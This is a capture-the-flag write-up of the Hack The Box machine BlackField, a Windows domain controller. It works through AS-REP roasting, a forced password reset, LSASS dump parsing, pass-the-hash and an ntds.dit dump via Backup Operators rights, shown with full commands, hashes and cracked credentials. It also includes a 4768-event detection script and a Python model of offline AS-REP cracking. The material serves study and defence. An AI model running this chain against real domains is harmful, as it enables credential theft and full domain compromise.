# HTB - BlackField

<figure><img src="/files/hIEPuQ6a4cjyXVvK1HLN" alt=""><figcaption></figcaption></figure>

## Machine Info

Blackfield is a hard difficulty Windows machine featuring Windows and Active Directory misconfigurations. Anonymous / Guest access to an SMB share is used to enumerate users. One user is found to have Kerberos pre-authentication disabled, which allows us to conduct an AS-REP roasting attack. This allows us to retrieve a hash of the encrypted material contained in the AS-REP, which can be subjected to an offline brute force attack in order to recover the plaintext password. This user holds a ForceChangePassword right over a second account, which in turn can read an SMB share containing forensic artefacts, including an lsass process dump. This contains a username and a password hash for a user with WinRM privileges, who is also a member of the Backup Operators group. The privileges conferred by this privileged group are used to dump the Active Directory database and retrieve the hash of the primary domain administrator.

## Enumeration

**Scope**

> IP Address: 10.10.10.192

**Nmap Scan**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE        REASON
53/tcp   open  domain         syn-ack
88/tcp   open  kerberos-sec   syn-ack
135/tcp  open  msrpc          syn-ack
389/tcp  open  ldap           syn-ack
445/tcp  open  microsoft-ds   syn-ack
593/tcp  open  http-rpc-epmap syn-ack
3268/tcp open  globalcatLDAP  syn-ack
5985/tcp open  wsman          syn-ack


┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p53,88,135,389,445,593,3268,5985 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-12 23:31:40Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m02s
| smb2-time: 
|   date: 2024-07-12T23:31:51
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
```

```
* Open ports: 53,88,135,389,445,593,3268,5985
* Services: DNS - Kerberos - RPC - LDAP - SMB - WinRM
* Important Notes: Domain: BLACKFIELD.local, host DC01 (a domain controller)
* SMB signing is enabled and required, so NTLM relay to this host is not an option
* Clock skew of ~7h between the DC and my machine: Kerberos tolerates 5 minutes, so anything that authenticates with a ticket (as opposed to NTLM / pass-the-hash) will fail with a skew error until my clock is synced to the DC
```

**RPC Enumeration**

<figure><img src="/files/iXTzVTJxRaZoKAeCwnRR" alt=""><figcaption></figcaption></figure>

**SMB Enumeration**

When I connected to the SMB server with an anonymous login, it failed

<figure><img src="/files/R8h7snY8n72d2aKQrLJJ" alt=""><figcaption></figcaption></figure>

However, when I attempted to authenticate with the `guest` account, I got a hit

<figure><img src="/files/ALopTOUMy3ZqlvHmfli9" alt=""><figcaption></figcaption></figure>

`smbclient` shows the same results, too

<figure><img src="/files/376RY7kIasjipvPe6s9P" alt=""><figcaption></figcaption></figure>

I mounted the share on my Kali machine to explore it more easily

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ sudo mount -t cifs "\\\\$ip\\profiles$" ./mount
Password for root@\\10.10.10.192\profiles$:
```

<figure><img src="/files/mrkq0TiqqehDGeTh6P6h" alt=""><figcaption></figcaption></figure>

The folder names look like people's names, which suggests roaming profile directories named after user accounts. So I will save the listing as a wordlist and test it against Kerberos to find which of them are valid usernames

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ ls mount | tee -a users.txt

<snip>
```

**Kerberos Enumeration**

I found three valid users with `kerbrute`

<figure><img src="/files/V7rw0W33KNrUMOXK2inj" alt=""><figcaption></figcaption></figure>

When I attempted an AS-REP roasting attack against these users, I got a hash for the user `support`: it is the only one of the three with pre-authentication disabled (`UF_DONT_REQUIRE_PREAUTH`), so the KDC hands out an AS-REP, whose encrypted part is keyed with the user's password, to anyone who asks

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ impacket-GetNPUsers BLACKFIELD.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.txt
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:30c1b9d2109600c3ebb0e38fb20ab14d$4473af423266d56382e57fc031bae65483b913e45c4a0efcf25fb62008518a2a385360f1d5a5bdd1cec5adb730154b1108bf3739f84ea86e3d4d62fe0ba6d1bcf74e09831c8d5ecc2aa0135f848d34a3e6e961a6faecb4b74298262263c9184ffc5aa4b9ae0f81330e08915a1892ebc53551bd39e1040a6218f0cd4e580483fb3c584b60dda863a39134a4cfa4eb573c5dfabebcc54120404f33169419086a3ae31382ebd3b05c29e3e525459991fcfc9a65d4cc764b6e7a714a0a39616f794884dd1eee275ceb091ce8bc4f2a1de7a0cdeb43b418d03a706dd3b3a9d3d70353fc94e9084892e3a038c711c395430c1dcf3277b9
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
```
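Before cracking, the defender's view of the request above, as an added example that is not part of the writeup: the DC records every AS-REQ as Security event 4768 (this assumes the "Audit Kerberos Authentication Service" subcategory is enabled for success and failure). The roast shows up as a TGT issued with Pre-Authentication Type 0, and the username guessing that preceded it as a run of status 0x6 (unknown principal) failures from one source. The events, the source address 10.10.14.5 and the account names are constructed.

```python
"""DC-side view of the AS-REP request above, as detection logic over 4768 events.

Added example, not part of the original writeup. The records are constructed
stand-ins for Security event 4768 ("A Kerberos authentication ticket (TGT) was
requested") reduced to the EventData fields a SIEM would forward; the source
address 10.10.14.5, the names and the counts are made up.
"""
from collections import defaultdict

# Constructed sample: one source sprays names (unknown principals fail with
# status 0x6, which is what kerbrute-style enumeration leaves behind), then
# obtains an AS-REP for an account without pre-auth (PreAuthType 0, Status
# 0x0, RC4 etype 0x17). One unrelated typo from 10.10.10.50 is the noise floor.
SAMPLE_4768 = [
    {"TargetUserName": n, "Status": "0x6", "PreAuthType": "-",
     "TicketEncryptionType": "0xffffffff", "IpAddress": "::ffff:10.10.14.5"}
    for n in ("jdoe", "asmith", "mlee", "pkim", "rwong")
] + [
    {"TargetUserName": "audit2020", "Status": "0x0", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.50"},  # normal logon, pre-auth done
    {"TargetUserName": "support", "Status": "0x0", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},   # AS-REP handed out, no pre-auth
    {"TargetUserName": "audit202", "Status": "0x6", "PreAuthType": "-",
     "TicketEncryptionType": "0xffffffff", "IpAddress": "::ffff:10.10.10.50"},  # a single typo
]


def _ip(event):
    """Windows logs IPv4 clients as ::ffff:a.b.c.d; strip the mapping prefix."""
    addr = event["IpAddress"]
    return addr[7:] if addr.startswith("::ffff:") else addr


def find_asrep_roasting(events):
    """TGTs issued with no pre-authentication: the reply is crackable offline.
    Returns (source_ip, account, etype); etype 0x17 is RC4, the cheap case."""
    return [
        (_ip(e), e["TargetUserName"].lower(), e["TicketEncryptionType"].lower())
        for e in events
        if e.get("EventID", 4768) == 4768
        and e["Status"].lower() == "0x0"
        and e["PreAuthType"] == "0"
    ]


def find_user_enumeration(events, threshold=5):
    """Many distinct unknown principals (0x6) from one source: username guessing.
    Returns {source_ip: sorted names} for every source at or over the threshold."""
    unknown = defaultdict(set)
    for e in events:
        if e.get("EventID", 4768) == 4768 and e["Status"].lower() == "0x6":
            unknown[_ip(e)].add(e["TargetUserName"].lower())
    return {ip: sorted(names) for ip, names in unknown.items() if len(names) >= threshold}


def triage(events, threshold=5):
    """Join the two signals: a source that both enumerated and roasted is the strongest lead."""
    roasted = {ip for ip, _, _ in find_asrep_roasting(events)}
    return sorted(roasted & set(find_user_enumeration(events, threshold)))


if __name__ == "__main__":
    print("roastable AS-REPs:", find_asrep_roasting(SAMPLE_4768))
    print("enumeration from:", find_user_enumeration(SAMPLE_4768))
    print("enumerate + roast:", triage(SAMPLE_4768))
```

The threshold is the tunable part: a single 0x6 is a typo, dozens from one address in a minute are a wordlist. On the fix side the roastable accounts are simply those with the flag set, `Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true'`, and `Set-ADAccountControl -DoesNotRequirePreAuth $false` clears it.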

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt

$krb5asrep$23$support@BLACKFIELD.LOCAL:30c1b9d2109600c3ebb0e38fb20ab14d$4473af423266d56382e57fc031bae65483b913e45c4a0efcf25fb62008518a2a385360f1d5a5bdd1cec5adb730154b1108bf3739f84ea86e3d4d62fe0ba6d1bcf74e09831c8d5ecc2aa0135f848d34a3e6e961a6faecb4b74298262263c9184ffc5aa4b9ae0f81330e08915a1892ebc53551bd39e1040a6218f0cd4e580483fb3c584b60dda863a39134a4cfa4eb573c5dfabebcc54120404f33169419086a3ae31382ebd3b05c29e3e525459991fcfc9a65d4cc764b6e7a714a0a39616f794884dd1eee275ceb091ce8bc4f2a1de7a0cdeb43b418d03a706dd3b3a9d3d70353fc94e9084892e3a038c711c395430c1dcf3277b9:#00^BlackKnight

Session..........: hashcat
Status...........: Cracked
```
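What `hashcat -m 18200` is actually doing with that line, as an added example that is not from the writeup, impacket or hashcat: a pure-Python model of the RC4-HMAC (etype 23) AS-REP enc-part from RFC 4757, playing both the KDC that produces the blob and the attacker that tests candidate passwords against it. The user, realm, password, confounder and the bytes standing in for the ASN.1 `EncASRepPart` are constructed; MD4 is implemented inline because OpenSSL builds often ship without it.

```python
"""Model of hashcat mode 18200: the RC4-HMAC (etype 23) AS-REP enc-part.

Added example, not from the writeup, impacket or hashcat. The user, realm,
password, confounder and the stand-in for the ASN.1 EncASRepPart are all
constructed. Pure Python on purpose: MD4 is frequently absent from OpenSSL."""
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF
ASREP_USAGE = 8  # RFC 4757 maps the AS-REP enc-part key usage (3 in RFC 4120) to 8 for RC4-HMAC


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    rot = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    F = lambda x, y, z: (x & y) | (~x & MASK & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, tuple(range(16)), (3, 7, 11, 19), 0),
        (G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", bytes(msg[off:off + 64]))
        a, b, c, d = h
        for fn, order, shifts, k in rounds:
            for i in range(16):
                a = rot((a + fn(b, c, d) + X[order[i]] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate register roles for the next step
        h = [(x + y) & MASK for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE password); for etype 23 this *is* the Kerberos key (no salt)."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = None) -> bytes:
    """KDC side (RFC 4757): checksum || RC4(K3, confounder || plaintext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = (confounder or os.urandom(8)) + plaintext
    checksum = _hmac_md5(k1, data)  # the 32 hex chars before '$' in the hashcat line
    k3 = _hmac_md5(k1, checksum)    # the RC4 key is derived from that checksum
    return checksum + rc4(k3, data)


def rc4hmac_decrypt(key: bytes, usage: int, blob: bytes):
    """Attacker side: the plaintext, or None when the checksum fails (wrong key)."""
    checksum, edata = blob[:16], blob[16:]
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = rc4(_hmac_md5(k1, checksum), edata)
    if not hmac.compare_digest(_hmac_md5(k1, data), checksum):
        return None
    return data[8:]  # strip the 8-byte confounder


def hashcat_asrep_line(user: str, realm: str, blob: bytes) -> str:
    """Same layout GetNPUsers -format hashcat emits."""
    return f"$krb5asrep$23${user}@{realm}:{blob[:16].hex()}${blob[16:].hex()}"


def parse_asrep_line(line: str):
    ident, rest = line[len("$krb5asrep$23$"):].split(":", 1)
    checksum, edata = rest.split("$", 1)
    return ident, bytes.fromhex(checksum) + bytes.fromhex(edata)


def check_candidate(line: str, password: str) -> bool:
    """One guess: derive the key from the candidate and see whether the HMAC verifies."""
    _, blob = parse_asrep_line(line)
    return rc4hmac_decrypt(nt_hash(password), ASREP_USAGE, blob) is not None


def crack(line: str, wordlist):
    return next((pw for pw in wordlist if check_candidate(line, pw)), None)


# Constructed demo: play the KDC for an account with pre-auth disabled, then the attacker.
DEMO_USER, DEMO_REALM, DEMO_PASSWORD = "support", "EXAMPLE.LOCAL", "Winter2020!"
DEMO_PLAINTEXT = b"stand-in for the ASN.1 EncASRepPart (session key, times, ...)"


def build_demo_line() -> str:
    blob = rc4hmac_encrypt(nt_hash(DEMO_PASSWORD), ASREP_USAGE, DEMO_PLAINTEXT)
    return hashcat_asrep_line(DEMO_USER, DEMO_REALM, blob)


if __name__ == "__main__":
    line = build_demo_line()
    print(line)
    print("cracked:", crack(line, ["password", "Summer2019!", DEMO_PASSWORD]))
```

The point of the exercise: with etype 23 the encrypted part is keyed directly by the NT hash, with no salt and no iteration, so each guess costs one MD4, three HMAC-MD5s and one RC4 pass, which is why rockyou falls through in seconds. The AES etypes (17/18) derive the key with PBKDF2 at 4096 iterations and are far slower to guess against, but the real fix is re-enabling pre-authentication, after which the KDC will not issue the AS-REP until the client proves knowledge of the key.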

## Initial Access

Confirm the credentials we got

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u support -p '#00^BlackKnight'

SMB     10.10.10.192    445    DC01    [+] BLACKFIELD.local\support:#00^BlackKnight
```

List shares that `support` has access to

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u support -p '#00^BlackKnight' --shares                                                                   
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight                                    
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark                                          
SMB         10.10.10.192    445    DC01             -----           -----------     ------                                          
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin                                    
SMB         10.10.10.192    445    DC01             C$                              Default share                                   
SMB         10.10.10.192    445    DC01             forensic                        Forensic / Audit share.                         
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC                                      
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share                              
SMB         10.10.10.192    445    DC01             profiles$       READ
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share 
```

* I couldn't find any interesting files even though I had valid credentials (note that `support` has no permissions on `forensic`), so I will continue enumeration with `bloodhound.py`

Enumerate the domain with `bloodhound.py` and feed the resulting zip file to the BloodHound GUI

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ bloodhound-python -u 'support' -p '#00^BlackKnight' -ns $ip -d blackfield.local -c all
```

Looking at BloodHound, I found that `support` has `ForceChangePassword` over `audit2020`, i.e. it can reset that user's password without knowing the current one

<figure><img src="/files/0vCgjkAJriEQeP0P5SZK" alt=""><figcaption></figcaption></figure>

I ran a custom Cypher query in BloodHound to see which users can PSRemote to the machine. A query that only walks `CanPSRemote` edges starting at users misses rights inherited through groups, so this one follows group membership first (`MemberOf*0..`; zero hops included so directly assigned rights still match):

```cypher
MATCH p=(u:User)-[:MemberOf*0..]->(g)-[:CanPSRemote]->(c:Computer) RETURN p
```

<figure><img src="/files/xuGkN0AHrojajt6Mt5pF" alt=""><figcaption></figcaption></figure>

I searched for a way to change a user's password without having access to the machine and found this command in this post: <https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword>. It goes over SAMR (`rpcclient`'s `setuserinfo` with information level 23 sets a new password without supplying the old one), which is exactly what the ForceChangePassword right permits

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ rpcclient -U "support%#00^BlackKnight" $ip

rpcclient $> setuserinfo
Usage: setuserinfo username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo audit2020 23 P@ssword123!
```

I managed to change the password, but `audit2020` still has no PSRemote access to the machine, so I will enumerate the shares again as `audit2020`. Note that a reset like this is destructive: the old password is not recoverable and the legitimate user is locked out, so on a real engagement it needs explicit approval and should be logged in the report

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u audit2020 -p 'P@ssword123!'                              
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:P@ssword123! 
```

I got read access to the `forensic` share as `audit2020`

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u audit2020 -p 'P@ssword123!' --shares

SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:P@ssword123! 
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic        READ            Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share 
```

I will mount the share on my Kali machine and start navigating it

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ sudo mount -t cifs "\\\\$ip\\forensic" ./mount -o "username=audit2020,password=P@ssword123\!" 
[sudo] password for kali: 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ ls mount         
commands_output  memory_analysis  tools
```

The `commands_output` and `memory_analysis` directories look interesting, and `lsass.zip` is the most important file here: an LSASS memory dump holds the credential material of every account that was logged on when it was taken

<figure><img src="/files/mR5l0Ze0PvFFufTn8azG" alt=""><figcaption></figcaption></figure>

`zip` file content

```
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ unzip -l lsass.zip                               
Archive:  lsass.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
143044222  2020-02-23 11:02   lsass.DMP
---------                     -------
143044222                     1 file

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ unzip lsass.zip   
Archive:  lsass.zip
  inflating: lsass.DMP
```

I will extract secrets from this memory dump with `pypykatz`, a Python reimplementation of mimikatz's credential-extraction logic, so the minidump can be parsed from Linux

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ pypykatz lsa minidump ./lsass.DMP

FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
                DPAPI: a03cd8e9d30171f3cfe8caad92fef621

<snip>

== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
        == MSV ==
                Username: Administrator
                Domain: BLACKFIELD
                LM: NA
                NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
                SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
                DPAPI: 240339f898b6ac4ce3f34702e4a8955

<snip>
```

I tried to authenticate with the `NT` hashes of `svc_backup` and `administrator` (pass-the-hash, so the 7h clock skew does not matter here). `svc_backup` worked but the admin hash did not: the dump dates from February 2020 and the Administrator password has been changed since, which the live `ntds.dit` later confirms (a different NT hash). Credentials from a dump are only as fresh as the dump

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d     

SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62

SMB         10.10.10.192    445    DC01             [-] BLACKFIELD.local\administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62 STATUS_LOGON_FAILURE 
```

We know from BloodHound that `svc_backup` can PSRemote to the machine, so I will connect with `evil-winrm` using the hash

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ evil-winrm -i $ip -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

*Evil-WinRM* PS C:\Users\svc_backup\Documents> type ..\Desktop\user.txt
3920bb317a0bef51xxxxxxxxxxxxxxxx
```

> User Flag: 3920bb317a0bef51xxxxxxxxxxxxxxxx

## Privilege Escalation

`svc_backup` is a member of the privileged `Backup Operators` group. Membership grants `SeBackupPrivilege` and `SeRestorePrivilege`, which let the account read (and write) any file on the system regardless of its ACL as long as it is opened in backup mode; on a domain controller that includes `ntds.dit` and the registry hives, which is enough to obtain `Domain Admin` credentials.

<figure><img src="/files/bXOzABsh6rBp9a0TrzEF" alt=""><figcaption></figcaption></figure>

`ntds.dit` is held open exclusively by the directory service while the DC is running, so it cannot be copied directly. Instead I will create a Volume Shadow Copy of `C:` with `diskshadow.exe` and read the database from the snapshot. Create this script file (`vss.dsh`) containing the `diskshadow` commands:

```
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
exit
```

I ran into an issue when running `diskshadow`; after asking the community, the cause turned out to be the line endings rather than the content: the script was written on Linux with LF endings and `diskshadow` expects Windows CRLF. `unix2dos` converts it:

```bash
unix2dos vss.dsh
```

Create a shadow copy

```PowerShell
*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s .\vss.dsh
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  7/12/2024 7:46:57 PM

-> set verbose on
-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create

The shadow copy was successfully exposed as E:\.
-> end backup
-> exit
```

Copy the database file from the shadow copy to the current directory. `Copy-FileSeBackupPrivilege` comes from the SeBackupPrivilege project's `SeBackupPrivilegeCmdLets.dll` (uploaded beforehand with evil-winrm's `upload` command); it opens the file in backup mode, which is what lets the privilege bypass the ACL that would otherwise block a plain copy

```PowerShell
*Evil-WinRM* PS C:\Users\svc_backup\Documents> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit .\ntds.dit
```

Get the `SYSTEM` hive, which holds the boot key needed to decrypt the password encryption key (PEK) and with it the hashes in `ntds.dit`; `reg save` works here because Backup Operators may save hives

```PowerShell
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save HKLM\SYSTEM SYSTEM.SAV
```

Dump the secrets from the database offline on Kali (`LOCAL` tells secretsdump to work from the files rather than a live target)

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM.SAV  LOCAL                                                                                                                                                                           
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480bxxxxxxxxxxxxxxx:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:a6504030ea199802f249588cdcabfab1:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c5f2d015f316018f6405522825689ffe:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ evil-winrm -i $ip -u administrator -H 184fb5e5178480bexxxxxxxxxxxx         

*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
4375a629c7c67c8e29dxxxxxxxxxxxx
```

> Root Flag: 4375a629c7c67c8exxxxxxxxxxxx

